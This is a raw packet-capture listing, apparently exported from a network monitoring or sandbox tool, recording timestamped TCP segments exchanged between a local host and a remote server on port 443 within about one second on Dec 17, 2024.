                                                                                                                                                                              Dec 17, 2024 18:12:46.096101046 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.096107006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.096143961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.098386049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.098462105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.098468065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.098511934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.100748062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.100828886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.100833893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.100872040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.103058100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.103137016 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.103142023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.103177071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.105331898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.105402946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.105408907 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.105444908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.107698917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.107769012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.107775927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.107815027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.110080957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.110152006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.110157967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.110193968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.112567902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.112636089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.112642050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.112695932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.114655018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.114738941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.114744902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.114797115 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.117047071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.117110968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.117116928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.117158890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.119334936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.119505882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.119512081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.119556904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.121726990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.121797085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.121803045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.121838093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.123996973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.124059916 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.124066114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.124102116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.127260923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.127336979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.127342939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.127384901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.283437967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.283574104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.283603907 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.283660889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.286091089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.286173105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.286195040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.286236048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.288204908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.288273096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.288290977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.288331985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.290488958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.290575027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.290594101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.290642023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.292805910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.292876005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.292892933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.292941093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.295182943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.295247078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.295268059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.295309067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.297508001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.297595024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.297611952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.297652006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.299776077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.299855947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.299864054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.299907923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.302203894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.302287102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.302294970 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.302331924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.304460049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.304539919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.304548025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.304589033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.306787014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.306869030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.306884050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.306934118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.309102058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.309185982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.309199095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.309242010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.311501026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.311599016 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.311611891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.311662912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.314578056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.314681053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.314687967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.314730883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.316869974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.316976070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.316982985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.317024946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.319978952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.320097923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.320112944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.320172071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.475609064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.475763083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.475795984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.475845098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.477607965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.477699995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.477718115 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.477772951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.480739117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.480823040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.480854988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.480914116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.482342958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.482426882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.482454062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.482503891 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.484575033 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.484663963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.484685898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.484736919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.487694025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.487808943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.487823009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.487869978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.489351034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.489439011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.489455938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.489520073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.491600037 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.491689920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.491719007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.491776943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.494677067 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.494769096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.494800091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.494854927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.497065067 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.497148037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.497181892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.497231007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.498538971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.498622894 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.498635054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.498687983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.501724005 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.501816988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.501835108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.501914978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.504000902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.504101992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.504144907 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.504208088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.506298065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.506387949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.506401062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.506464958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.508620024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.508702040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.508724928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.508776903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.510946989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.511044025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.511058092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.511112928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.667732954 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.667835951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.667905092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.667969942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.669810057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.669900894 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.669917107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.669966936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.673121929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.673207998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.673222065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.673285007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.675167084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.675275087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.675287962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.675344944 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.677509069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.677649975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.677663088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.677719116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.679852009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.679936886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.679949999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.680003881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.682600975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.682693958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.682708025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.682763100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.684562922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.684643984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.684658051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.684715986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.686930895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.687005043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.687021017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.687088966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.689250946 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.689337969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.689352989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.689412117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.691528082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.691598892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.691612959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.691674948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.693872929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.693949938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.693964005 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.694025040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.696197033 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.696275949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.696291924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.696351051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.698546886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.698626041 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.698640108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.698693037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.700885057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.700973034 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.700985909 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.701037884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.703188896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.703269005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.703283072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.703346968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.859597921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.859781027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.859805107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.859868050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.862375021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.862482071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.862488985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.862540007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.864701986 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.864820004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.864825964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.864881992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.867115974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.867196083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.867202997 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.867245913 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.869364023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.869442940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.869448900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.869502068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.871694088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.871773958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.871779919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.871819973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.874020100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.874129057 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.874135017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.874186993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.876449108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.876555920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.876560926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.876616955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.878715992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.878803968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.878809929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.878853083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.881052971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.881129980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.881135941 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.881191015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.883358955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.883430004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.883436918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.883479118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.885637999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.885749102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.885761976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.885819912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.887979984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.888056040 CET49731443192.168.2.498.142.240.215
